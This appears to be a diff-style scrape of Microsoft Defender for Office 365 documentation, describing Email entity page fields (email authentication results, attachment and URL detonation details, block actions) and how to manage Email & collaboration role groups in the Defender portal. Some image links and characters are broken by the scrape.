- <sup>\*</sup> The :::image type="icon" source="../../media/m365-cc-sc-copy-icon.png" border="false"::: **Copy to clipboard** action is available to copy the value.
--- **Authentication** section: Details about [email authentication](email-authentication-about.md) results:
- - **[Domain-based Message Authentication (DMARC)](email-authentication-dmarc-configure.md)**
- - `Pass`: The DMARC check for the message passed.
- - `Fail`: The DMARC check for the message failed.
- - `BestGuessPass`: The DMARC TXT record for the domain doesn't, but if one existed, the DMARC check for the message would have passed.
- - None: Indicates that no DMARC TXT record exists for the sending domain in DNS.
- - **[DomainKeys identified mail (DKIM)](email-authentication-dkim-configure.md)**: Values are:
- - `Pass`: The DKIM check for the message passed.
- - `Fail (reason)`: The DKIM check for the message failed. For example, the message wasn't DKIM signed or the DKIM signature wasn't verified.
- - `None`: The message wasn't DKIM signed. This result might or might not indicate that the domain has a DKIM record, or that the DKIM record doesn't evaluate to a result. This result only indicates that this message wasn't signed.
- - **[Sender Policy Framework (SPF)](email-authentication-spf-configure.md)**: Values are:
- - `Pass (IP address)`: The SPF check found the message source is valid for the domain.
- - `Fail (IP address)`: The SPF check found the message source isn't valid for the domain, and the enforcement rule in the SPF record is `-all` (hard fail).
- - `SoftFail (reason)`: The SPF check found the message source isn't valid for the domain, and the enforcement rule in the SPF record is `~all` (soft fail).
- - `Neutral`: The SPF check found the message source isn't valid for the domain, and the enforcement rule in the SPF record is `?all` (neutral).
- - `None`: The domain doesn't have an SPF record, or the SPF record doesn't evaluate to a result.
- - `TempError`: The SPF check encountered a temporary error (for example, a DNS error). The same check later might succeed.
- - `PermError`: The SPF check encountered a permanent error. For example, the domain has a [badly formatted SPF record](email-authentication-spf-configure.md#troubleshooting-spf-txt-records).
- - **Composite authentication**: SPF, DKIM, DMARC, and other information determines if the message sender (the From address) is authentic. For more information, see [Composite authentication](email-authentication-about.md#composite-authentication).
-- **Related entities** section: Information about attachments and URLs in the message:
- - **Entity**: Selecting **Attachments** or **URLs** takes you to the Attachments view or the URL view of the Email entity page for the message.
- - **Total count**
- - **Threats found**: The values are **Yes** or **No**.
-- Message details area:
- - **Plain-text email header** tab: Contains the entire message header in plain text. Select :::image type="icon" source="../../media/m365-cc-sc-copy-icon.png" border="false"::: **Copy message header** to copy the message header. Select :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **Microsoft Message Header Analyzer** to open the Message Header Analyzer at <https://mha.azurewebsites.net/pages/mha.html>. Paste the copied message header into the page, and then select **Analyze headers** for details about the message headers and values.
- - **To** tab: Shows the first 5,000 characters of any email addresses in the To field of the message.
- - **Cc** tab: Shows the first 5,000 characters of any email addresses in the Cc field of the message.
--
-### Attachments view
-
-The **Attachments** view shows information about all file attachments in the message, and the scanning results of those attachments.
-
-The following attachment information is available in this view. Select a column header to sort by that column. To add or remove columns, select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns**. By default, all available columns are selected.
--- **Attachment filename**: If you click on the filename value-- **File type**-- **File size**-- **File extension**-- **Threat**-- **Malware family**-- **Attachment SHA256**: The :::image type="icon" source="../../media/m365-cc-sc-copy-icon.png" border="false"::: **Copy to clipboard** action is available to copy the SHA256 value.-- **Details**-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find information on the page. Type text in the box and then press the ENTER key.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the data in the view to a CSV file. The default filename is **- Microsoft Defender.csv** and the default location is the **Downloads** folder. If a file with that name already exists, the filename is appended with a number (for example, **- Microsoft Defender(1).csv**).
--
-#### Attachment details
-
-If you select an entry in the **Attachments** view by clicking on the **Attachment filename** value, a details flyout opens that contains the following information:
--- **Deep analysis** tab: Information is available on this tab if [Safe Attachments](safe-attachments-about.md) scanned (detonated) the attachment. You can identify these messages in Threat Explorer by using the query filter **Detection technology** with the value **File detonation**.-
- - **Detonation chain** section: Safe Attachments detonation of a single file can trigger multiple detonations. The _detonation chain_ tracks the path of detonations, including the original malicious file that caused the verdict, and all other files affected by the detonation. These attached files might not be directly present in the email. But, including the analysis is important to determining why the file was found to be malicious.
-
- If no detonation chain information is available, the value **No detonation tree** is shown. Otherwise, you can select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to download the detonation chain information to a CSV file. The default filename is **Detonation chain.csv** and the default location is the **Downloads** folder. If a file with that name already exists, the filename is appended with a number (for example, **Detonation chain(1).csv**). The CSV file contains the following information:
- - **Top**: The top level file.
- - **Level1**: The next level file.
- - **Level2**: The next level file.
- - and so on.
-
- The detonation chain and the CSV file might show just the top level item if none of the entities linked to it were found to be problematic or were detonated.
-
- - **Summary** section: If no detonation summary information is available, the value **No detonation summary** is shown. Otherwise, the following detonation summary information is available:
- - **Analysis time**
- - **Verdict**: The verdict on the attachment itself.
- - **More info**: The file size in bytes.
- - **Indicators of compromise**
-
- - **Screenshots section**: Show any screenshots that were captured during detonation. No screenshots are captured for container files like ZIP or RAR that contain other files.
-
- If no detonation screenshots are available, the value **No screenshots to display** is shown. Otherwise, select the link to view the screenshot.
-
- - **Behavior details** section: Shows the exact events that took place during detonation, and problematic or benign observations that contain URLs, IPs, domains, and files that were found during detonation. There might not be any behavior details for container files like ZIP or RAR that contain other files.
-
- If no behavior details information is available, the value **No detonation behaviors** is shown. Otherwise, you can select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to download the behavioral details information to a CSV file. The default filename is **Behavior details.csv** and the default location is the **Downloads** folder. If a file with that name already exists, the filename is appended with a number (for example, **Behavior details(1).csv**). The CSV file contains the following information:
- - **Time**
- - **Behavior**
- - **Behavior property**
- - **Process (PID)**
- - **Operation**
- - **Target**
- - **Details**
- - **Result**
-- **File info** tab: The **File details** section contains the following information:
- - **File name**
- - **SHA256**
- - **File size** (in bytes)
-
-When you're finished in the file details flyout, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: **Close**.
--
-#### Block attachments from the Attachments view
-
-If you select an entry in the **Attachments** view by selecting the check box next to the filename, the :::image type="icon" source="../../medi#block-entries-in-the-tenant-allowblock-list). Selecting **Block** starts the **Take action** wizard:
-
-1. On the **Choose actions** page, configure one of following settings in the **Block file** section:
- - **Never expire** on: This is the default value :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
- - **Never expire** off: Slide the toggle to off :::image type="icon" source="../../media/scc-toggle-off.png" border="false"::: and then select a date in the **Remove on** box.
-
- When you're finished on the **Choose actions** page, select **Next**.
-
-2. On the **Choose target entities** page, verify the file that you want to block is selected, and then select **Next**.
-
-3. On the **Review and submit** page, configure the following settings:
- - **Remediation name**: Enter a unique name to track the status in the Action center.
- - **Description**: Enter an optional description.
-
- When you're finished on the **Review and submit** page, select **Submit**.
-
-### URL view
-
-The **URL** view shows information about all URLs in the message, and the scanning results of those URLs.
-
-The following attachment information is available in this view. Select a column header to sort by that column. To add or remove columns, select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns**. By default, all available columns are selected.
--- **URL**-- **Threat**-- **Source**-- **Details**-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find information on the page. Type text in the box and then press the ENTER key.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the data in the view to a CSV file. The default filename is **- Microsoft Defender.csv** and the default location is the **Downloads** folder. If a file with that name already exists, the filename is appended with a number (for example, **- Microsoft Defender(1).csv**).
--
-#### URL details
-
-If you select an entry in the **URL** view by clicking on the **URL** value, a details flyout opens that contains the following information:
--- **Deep analysis** tab: Information is available on this tab if [Safe Links](safe-links-about.md) scanned (detonated) the URL. You can identify these messages in Threat Explorer by using the query filter **Detection technology** with the value **URL detonation**.-
- - **Detonation chain** section: Safe Links detonation of a single URL can trigger multiple detonations. The _detonation chain_ tracks the path of detonations, including the original malicious URL that caused the verdict, and all other URLs affected by the detonation. These URLs might not be directly present in the email. But, including the analysis is important to determining why the URL was found to be malicious.
-
- If no detonation chain information is available, the value **No detonation tree** is shown. Otherwise, you can select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to download the detonation chain information to a CSV file. The default filename is **Detonation chain.csv** and the default location is the **Downloads** folder. If a file with that name already exists, the filename is appended with a number (for example, **Detonation chain(1).csv**). The CSV file contains the following information:
- - **Top**: The top level file.
- - **Level1**: The next level file.
- - **Level2**: The next level file.
- - and so on.
-
- The detonation chain and the CSV file might show just the top level item if none of the entities linked to it were found to be problematic or were detonated.
-
- - **Summary** section: If no detonation summary information is available, the value **No detonation summary** is shown. Otherwise, the following detonation summary information is available:
- - **Analysis time**
- - **Verdict**: The verdict on the URL itself.
-
- - **Screenshots section**: Show any screenshots that were captured during detonation. No screenshots are captured if the URL opens into a link that directly downloads a file. However, you see the downloaded file in the detonation chain.
-
- If no detonation screenshots are available, the value **No screenshots to display** is shown. Otherwise, select the link to view the screenshot.
-
- - **Behavior details** section: Shows the exact events that took place during detonation, and problematic or benign observations that contain URLs, IPs, domains, and files that were found during detonation.
-
- If no behavior details information is available, the value **No detonation behaviors** is shown. Otherwise, you can select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to download the behavioral details information to a CSV file. The default filename is **Behavior details.csv** and the default location is the **Downloads** folder. If a file with that name already exists, the filename is appended with a number (for example, **Behavior details(1).csv**). The CSV file contains the following information:
- - **Time**
- - **Behavior**
- - **Behavior property**
- - **Process (PID)**
- - **Operation**
- - **Target**
- - **Details**
- - **Result**
-- **URL info** tab: The **URL details** section contains the following information:
- - **URL**
- - **Threat**
-
-When you're finished in the file details flyout, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: **Close**.
--
-#### Block URLs from the URL view
-
-If you select an entry in the **URL** view by selecting the check box next to the filename, the :::image type="icon" source="../../medi#block-entries-in-the-tenant-allowblock-list). Selecting **Block** starts the **Take action** wizard:
-
-1. On the **Choose actions** page, configure one of following settings in the **Block URL** section:
- - **Never expire** on: This is the default value :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
- - **Never expire** off: Slide the toggle to off :::image type="icon" source="../../media/scc-toggle-off.png" border="false"::: and then select a date in the **Remove on** box.
-
- When you're finished on the **Choose actions** page, select **Next**.
-
-2. On the **Choose target entities** page, verify the URL that you want to block is selected, and then select **Next**.
-
-3. On the **Review and submit** page, configure the following settings:
- - **Remediation name**: Enter a unique name to track the status in the Action center.
- - **Description**: Enter an optional description.
-
- When you're finished on the **Review and submit** page, select **Submit**.
-
-## Similar emails view
-
-The **Similar emails** view shows other email messages that have the same message body fingerprint as this message. Matching criteria in other messages doesn't apply for this view (for example, file attachment fingerprints).
-
-The following attachment information is available in this view. Select a column header to sort by that column. To add or remove columns, select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns**. By default, all available columns are selected.
--- **Date**-- **Subject**-- **Recipient**-- **Sender**-- **Sender IP**-- **Override**-- **Delivery action**-- **Delivery location**-
-Use :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the entries by **Start date** and **End date**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find information on the page. Type text in the box and then press the ENTER key.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the data in the view to a CSV file. The default filename is **- Microsoft Defender.csv** and the default location is the **Downloads** folder. If a file with that name already exists, the filename is appended with a number (for example, **- Microsoft Defender(1).csv**).
--
-### Actions on the Email entity page
-
-The following actions are available at the top of the Email entity page:
--- :::image type="icon" source="../../medi#remediate-using-take-action).-- :::image type="icon" source="../../media/m365-cc-sc-view-message-headers-icon.png" border="false"::: **Email preview**┬╣ ┬▓-- :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options**:
- - :::image type="icon" source="../../medi#view-quarantined-email).
- - :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Download email**┬╣ ┬▓
-
- > [!TIP]
- > **Download email** isn't available for messages that were quarantined. Instead, [download a password protected copy of the message from quarantine](quarantine-admin-manage-messages-files.md#download-email-from-quarantine).
-
-┬╣ The **Email preview** and **Download email** actions require the **Preview** role. You can assign this role in the following locations:
--- [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations/Raw data (email & collaboration)/Email & collaboration content (read)**.-- [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in the **Data Investigator** or **eDiscovery Manager** role groups. Or, you can [create a new role group](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal) with the **Preview** role assigned, and add the users to the custom role group.-
-┬▓ You can preview or download email messages that are available in Microsoft 365 mailboxes. Examples of when messages are no longer available in mailboxes include:
--- The message was dropped before delivery or delivery failed.-- The message was _soft deleted_ (deleted from the Deleted items folder, which moves the message to the Recoverable Items\Deletions folder).-- ZAP moved the message to quarantine.--
-## The Email summary panel
-
-The _Email summary panel_ is the email details flyout that's available in many features in Exchange Online Protection (EOP) and Defender for Office 365. The Email summary panel contains standardized summary information about the email message taken from the full details that are available on the Email entity page in Defender for Office 365.
-
-Where to find the Email summary panel is described in the [Where to find the Email entity page](#where-to-find-the-email-entity-page) section earlier in this article. The rest of this section describes the information that's available on the Email summary panel across all features.
-
-> [!TIP]
-> The Email summary panel is available from the **Action center** page at <https://security.microsoft.com/action-center/> on the **Pending** or **History** tabs. Select an action with the **Entity type** value **Email** by clicking anywhere in the row other than the check box or the **Investigation ID** value. The details flyout that opens is the Email summary panel, but :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **Open email entity** isn't available at the top of the flyout.
-
-The following message information is available at the top of the Email summary panel:
--- The title of the flyout is the message Subject value.-- The number of attachments and links in the message (not present in all features).-- Any user tags that are assigned to the recipients of the message (including the Priority account tag). For more information, see [User tags in Microsoft Defender for Office 365](user-tags-about.md)-- The actions that are available at the top of the flyout depend on where you opened the Email summary panel. The available actions are described in the individual feature articles.-
-> [!TIP]
-> To see details about other messages without leaving the Email summary panel of the current message, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-The following sections are available on the Email summary panel for all features (it doesn't matter where you opened the Email summary panel from):
--- **Delivery details** section:
- - **Original threats**
- - **Latest threats**
- - **Original location**
- - **Latest delivery location**
- - **Delivery action**
- - **Detection technologies**
- - **Primary override : Source**
--- **Email details** section:
- - **Sender display name**
- - **Sender address**
- - **Sender email from address**
- - **Sent on behalf of**
- - **Return path**
- - **Sender IP**
- - **Location**
- - **Recipient(s)**
- - **Time received**
- - **Directionality**
- - **Network message ID**
- - **Internet message ID**
- - **Campaign ID**
- - **DMARC**
- - **DKIM**
- - **SPF**
- - **Composite authentication**
--- **URLs** section: Details about any URLs in the message:
- - **URL**
- - **Threat** status
-
- If the message has more than three URLs, select **View all URLs** to see all of them.
--- **Attachments** section: Details about any file attachments in the message:
- - **Attachment name**
- - **Threat**
- - **Detection tech / Malware family**
-
- If the message has more than three attachments, select **View all attachments** to see all of them.
-
security Mdo Portal Permissions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/mdo-portal-permissions.md
- Title: Microsoft Defender for Office 365 permissions in the Microsoft Defender portal
- - NOCSH
---
-ms.audience: Admin
--
- - m365-security
- - tier1
- - MOE150
- - MET150
-description: Admins can learn how to manage Microsoft Defender for Office 365 (Email & collaboration) permissions in the Microsoft Defender portal.
--- seo-marvel-apr2020- Previously updated : 6/15/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Microsoft Defender for Office 365 permissions in the Microsoft Defender portal
--
-Global roles in Microsoft Entra ID allow you to manage permissions and access to capabilities in all of Microsoft 365, which also includes Microsoft Defender for Office 365. But, if you need to limit permissions and capabilities to security features in Defender for Office 365 only, you can assign **Email & collaboration** permissions in the Microsoft Defender portal.
-
-To manage Defender for Office 365 permissions in the Microsoft Defender portal, go to **Permissions** \> **Email & collaboration roles** \> **Roles** or go directly to <https://security.microsoft.com/emailandcollabpermissions>.
-
-You need to be member of the **Global Administrator** role in Microsoft Entra ID or a member of the **Organization Management** role group in Defender for Office 365 permissions. Specifically, the **Role Management** role in Defender for Office 365 allows users to view, create, and modify Defender for Office 365 role groups. By default, that role is assigned only to the **Organization Management** role group (and by extension, global administrators).
-
-> [!NOTE]
-> Some Defender for Office 365 features require additional permissions in Exchange Online. For more information, see [Permissions in Exchange Online](/exchange/permissions-exo/permissions-exo).
->
-> Microsoft Defender XDR has its own Unified role-based access control (RBAC). This model provides a single permissions management experience in one central location where admins can control permissions across different security solutions. These permissions are different from the permissions described in this article. For more information, see [Microsoft Defender XDR role-based access control (RBAC)](../defender/manage-rbac.md).
->
-> **If you activate Defender XDR RBAC for Email & collaboration, the permissions page at <https://security.microsoft.com/emailandcollabpermissions> is no loger available in the Defender portal**.
->
-> For information about permissions in the Microsoft Purview compliance portal, see [Permissions in the Microsoft Purview compliance portal](/purview/microsoft-365-compliance-center-permissions).
-
-## Relationship of members, roles, and role groups
-
-Defender for Office 365 permissions in the Microsoft Defender portal are based on the role-based access control (RBAC) permissions model. RBAC is the same permissions model that's used by most Microsoft 365 services, so if you're familiar with the permission structure in these services, granting permissions in the Microsoft Defender portal should be familiar.
-
-A **role** grants the permissions to do a set of tasks.
-
-A **role group** is a set of roles that lets people do their jobs in the Microsoft Defender portal.
-
-Defender for Office 365 permissions in the Microsoft Defender portal includes default role groups for the most common tasks and functions that you need to assign. Generally, we recommend simply adding individual users as **members** to the default role groups.
--
-## Roles and role groups in the Microsoft Defender portal
-
-On the **Permissions** page in the Defender portal at <https://security.microsoft.com/securitypermissions>, the following types of roles and role groups are available:
--- **Microsoft Entra roles**: You can view the roles and assigned users, but you can't manage them directly in the Microsoft Defender portal. Microsoft Entra roles are central roles that assign permissions for **all** Microsoft 365 services.--- **Email & collaboration roles**: You can view and manage these role groups directly in the Microsoft Defender portal. These permissions are specific to the Microsoft Defender portal and the Microsoft Purview compliance portal. These permissions don't cover all of the permissions that you need in other Microsoft 365 workloads.--
-### Microsoft Entra roles in the Microsoft Defender portal
-
-Microsoft Entra roles that are described in this section are available in the [Defender portal](https://security.microsoft.com) \> **Permissions** \> **Microsoft Entra ID** \> **Roles** or directly at <https://security.microsoft.com/aadpermissions>.
-
-When you select a role, a details flyout opens that contains the description of the role and the user assignments. But to manage those assignments, you need to select **Manage members in Microsoft Entra ID** at the bottom of the flyout.
--
-For more information, see [Assign Microsoft Entra roles to users](/entra/identity/role-based-access-control/manage-roles-portal) and [Manage access to Microsoft Defender XDR with Microsoft Entra global roles](/microsoft-365/security/defender/m365d-permissions).
-
-|Role|Description|
-|||
-|**Global Administrator**|Access to all administrative features in all Microsoft 365 services. Only global administrators can assign other administrator roles. For more information, see [Global Administrator / Company Administrator](/entra/identity/role-based-access-control/permissions-reference#global-administrator--company-administrator).|
-|**Compliance Data Administrator**|Keep track of your organization's data across Microsoft 365, make sure it's protected, and get insights into any issues to help mitigate risks. For more information, see [Compliance Data Administrator](/entra/identity/role-based-access-control/permissions-reference#compliance-data-administrator).|
-|**Compliance Administrator**|Help your organization stay compliant with any regulatory requirements, manage eDiscovery cases, and maintain data governance policies across Microsoft 365 locations, identities, and apps. For more information, see [Compliance Administrator](/entra/identity/role-based-access-control/permissions-reference#compliance-administrator).|
-|**Security Operator**|View, investigate, and respond to active threats to your Microsoft 365 users, devices, and content. For more information, see [Security Operator](/entra/identity/role-based-access-control/permissions-reference#security-operator).|
-|**Security Reader**|View and investigate active threats to your Microsoft 365 users, devices, and content, but (unlike the Security operator) they don't have permissions to respond by taking action. For more information, see [Security Reader](/entra/identity/role-based-access-control/permissions-reference#security-reader).|
-|**Security Administrator**|Control your organization's overall security by managing security policies, reviewing security analytics and reports across Microsoft 365 products, and staying up-to-speed on the threat landscape. For more information, see [Security Administrator](/entra/identity/role-based-access-control/permissions-reference#security-administrator).|
-|**Global Reader**|The read-only version of the **Global administrator** role. View all settings and administrative information across Microsoft 365. For more information, see [Global Reader](/entra/identity/role-based-access-control/permissions-reference#global-reader).|
-|**Attack Simulation Administrator**|Create and manage all aspects of [attack simulation](attack-simulation-training-simulations.md) creation, launch/scheduling of a simulation, and the review of simulation results. For more information, see [Attack Simulation Administrator](/entra/identity/role-based-access-control/permissions-reference#attack-simulation-administrator).|
-|**Attack Payload Author**|Create attack payloads but not actually launch or schedule them. For more information, see [Attack Payload Author](/entra/identity/role-based-access-control/permissions-reference#attack-payload-author).|
-
-### Email & collaboration roles in the Microsoft Defender portal
-
-The same role groups and roles are available in the Defender portal and in the Purview compliance portal:
--- [Defender portal](https://security.microsoft.com): **Permissions** \> **Email & collaboration roles** \> **Roles** or directly at <https://security.microsoft.com/emailandcollabpermissions>-- [Purview compliance portal](https://compliance.microsoft.com): **Roles & Scopes** \> **Permissions** \> **Microsoft Purview solutions** \> **Roles** or directly at <https://compliance.microsoft.com/compliancecenterpermissions>-
-For complete information about these role groups, see [Roles and role groups in the Microsoft Defender XDR and Microsoft Purview compliance portals](scc-permissions.md)
-
-The following actions are available for Email & collaboration role groups in the Defender portal:
--- [Create role groups](#create-email--collaboration-role-groups-in-the-microsoft-defender-portal)-- [Copy role groups](#copy-email--collaboration-role-groups-in-the-microsoft-defender-portal)-- [Modify role group membership](#modify-email--collaboration-role-group-membership-in-the-microsoft-defender-portal)-- [Modify role assignments](#modify-email--collaboration-role-group-role-assignments-in-the-microsoft-defender-portal) (custom role groups only)-- [Remove role groups](#remove-email--collaboration-role-groups-in-the-microsoft-defender-portal) (custom role groups only)-
-#### Create Email & collaboration role groups in the Microsoft Defender portal
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Permissions** \> **Email & collaboration roles** \> **Roles**. Or, to go directly to the **Permissions** page, use <https://security.microsoft.com/emailandcollabpermissions>.
-
-2. On the **Permissions** page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create** to start the new role group wizard.
-
-3. On the **Name your role group** page, enter the following information:
- - **Name**: Enter a unique name for the role group.
- - **Description**: Enter an optional description for the role group.
-
- When you're finished on the **Name your role group** page, select **Next**.
-
-4. On the **Choose roles** page, select **Choose roles**.
-
- 1. In the **Chose roles** flyout that opens, select **Add** at the top of the flyout.
-
- 2. In the new **Choose roles** flyout that opens, select one or more roles. Select the **Name** column header to sort the list by name, or use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find the role.
-
- After you've selected one or more roles to add, select **Add** at the bottom of the flyout.
-
- Back on the original **Choose roles** flyout, the roles you added are listed on the page. To add more roles, repeat the previous step. Roles that you already selected are grayed out.
-
- To remove roles, select **Remove**. In the new **Choose roles** flyout that opens, select one or more roles, and then select **Remove**.
-
- 3. When you're finished on the original **Choose roles** flyout, select **Done**.
-
- Back on the **Choose roles** page, the roles are shown in the **Selected roles** section.
-
- When you're finished on the **Choose roles** page, select **Next**.
-
-5. On the **Choose members** page, select **Choose members**.
-
- 1. In the **Choose members** flyout that opens, select **Add** at the top of the flyout.
-
- 2. In the new **Choose members** flyout that opens, select one or more users. Select a column header to sort the list by **Name** or **Email address**, or use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find the user.
-
- After you've selected one or more users to add, select **Add** at the bottom of the flyout.
-
- Back on the original **Choose members** flyout, the members you added are listed on the page. To add more members, repeat the previous step. Members that you already selected are grayed out.
-
- To remove members, select **Remove**. In the new **Choose members** flyout that opens, select one or more members, and then select **Remove**.
-
- 3. When you're finished on the original **Choose roles** flyout, select **Done**.
-
- Back on the **Choose members** page, the members are shown in the **Selected members** section.
-
- When you're finished on the **Choose members** page, select **Next**.
-
-6. On the **Review your settings** page, review your settings. You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review your settings** page, select **Create role group**.
-
-Back on the **Permissions** page, the new role group is listed.
-
-#### Copy Email & collaboration role groups in the Microsoft Defender portal
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Permissions** \> **Email & collaboration roles** \> **Roles**. Or, to go directly to the **Permissions** page, use <https://security.microsoft.com/emailandcollabpermissions>.
-
-2. On the **Permissions** page, select the role group from the list. Use the **Name** column header to sort the list by name, or the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find the role group.
-
-3. In the role group details flyout that opens, select **Copy role group** at the top of the flyout.
-
-The new role group wizard opens as previously described for [creating a new role group](#create-email--collaboration-role-groups-in-the-microsoft-defender-portal).
-
-The default name of the new role group is **Copy of \<original role group name\>**, but you can change it.
-
-The roles and members are populated with the values from the role you're copying, but you can change them.
-
-#### Modify Email & collaboration role group membership in the Microsoft Defender portal
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Permissions** \> **Email & collaboration roles** \> **Roles**. Or, to go directly to the **Permissions** page, use <https://security.microsoft.com/emailandcollabpermissions>.
-
-2. On the **Permissions** page, select the role group from the list. Use the **Name** column header to sort the list by name, or the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find the role group.
-
-3. In the role group details flyout that opens, do one of the following steps:
-
- - Select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit role group** at the top of the flyout. In the edit role group wizard that opens, select the **Choose members** tab.
- - In the **Members** section of the flyout, select **Edit**.
-
-4. On the **Choose members** tab of the edit role group wizard that opens, do one of the following steps:
- - If there are no role group members, select **Choose members**.
- - If there are existing role group members, select **Edit**
-
-5. In the **Choose members** flyout that opens, do one of the following steps:
-
- - **Add members**: Select **Add** at the top of the flyout. In the new **Choose members** flyout that opens, select one or more users. Select a column header to sort the list by **Name** or **Email address**, or use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find the user.
-
- After you've selected one or more users to add, select **Add** at the bottom of the flyout.
-
- Back in the original **Choose members** flyout, the added users are shown in the **Members** section.
-
- - **Remove members**: Select **Remove** at the top of the flyout. In the new **Choose members** flyout that opens, select one or more users. Select a column header to sort the list by **Name** or **Email address**, or use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find the user.
-
- After you've selected one or more users to remove, select **Remove**.
-
- Back on the original **Choose members** flyout, the removed users are no longer shown in the **Members** section.
-
- When you're finished in the original **Choose members** flyout, select **Done**.
-
-6. Back on the **Choose members** tab of the wizard, select **Save**.
-
-7. Back on the role group details flyout, select **Done**.
-
-#### Modify Email & collaboration role group role assignments in the Microsoft Defender portal
-
-> [!NOTE]
-> You can modify the role assignments for custom role groups only. You can't modify the role assignments for built-in role groups.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Permissions** \> **Email & collaboration roles** \> **Roles**. Or, to go directly to the **Permissions** page, use <https://security.microsoft.com/emailandcollabpermissions>.
-
-2. On the **Permissions** page, select the role group from the list. Select the **Name** column header to sort the list by name, or use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find the role group.
-
-3. In the role group details flyout that opens, do one of the following steps:
-
- - Select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit role group** at the top of the flyout. In the edit role group wizard that opens, select the **Choose roles** tab.
- - In the **Assigned roles** section of the flyout, select **Edit**.
-
-4. On the **Choose roles** tab of the edit role group wizard that opens, do one of the following steps:
- - If there are no assigned roles, select **Choose roles**.
- - If there are existing roles assigned, select **Edit**
-
-5. In the **Choose roles** flyout that opens, do one of the following steps:
-
- - **Add roles**: Select **Add** at the top of the flyout. In the new **Choose roles** flyout that opens, select one or more roles. Roles that are already assigned are grayed out. Select the **Name** column header to sort the list by name, or use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find the role.
-
- After you've selected one or more roles to add, select **Add** at the bottom of the flyout.
-
- Back in the original **Choose roles** flyout, the added roles are shown in the **Roles** section.
-
- - **Remove roles**: Select **Remove** at the top of the flyout. In the new **Choose roles** flyout that opens, select one or more roles. Select a column header to sort the list by **Name**, or use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find the role.
-
- After you've selected one or more roles to remove, select **Remove**.
-
- Back on the original **Choose roles** flyout, the removed roles are no longer shown in the **Roles** section.
-
- When you're finished in the original **Choose roles** flyout, select **Done**.
-
-6. Back on the **Choose roles** tab of the wizard, select **Save**.
-
-7. Back on the role group details flyout, select **Done**.
-
-#### Remove Email & collaboration role groups in the Microsoft Defender portal
-
-> [!NOTE]
-> You can remove custom role groups only. You can't remove built-in role groups.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Permissions** \> **Email & collaboration roles** \> **Roles**. Or, to go directly to the **Permissions** page, use <https://security.microsoft.com/emailandcollabpermissions>.
-
-2. On the **Permissions** page, select the role group from the list. Select the **Name** column header to sort the list by name, or use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find the role group.
-
-3. In the role group details flyout that opens, select **Delete role group** at the top of the flyout.
-
-4. Select **Yes** in the warning dialog that opens.
-
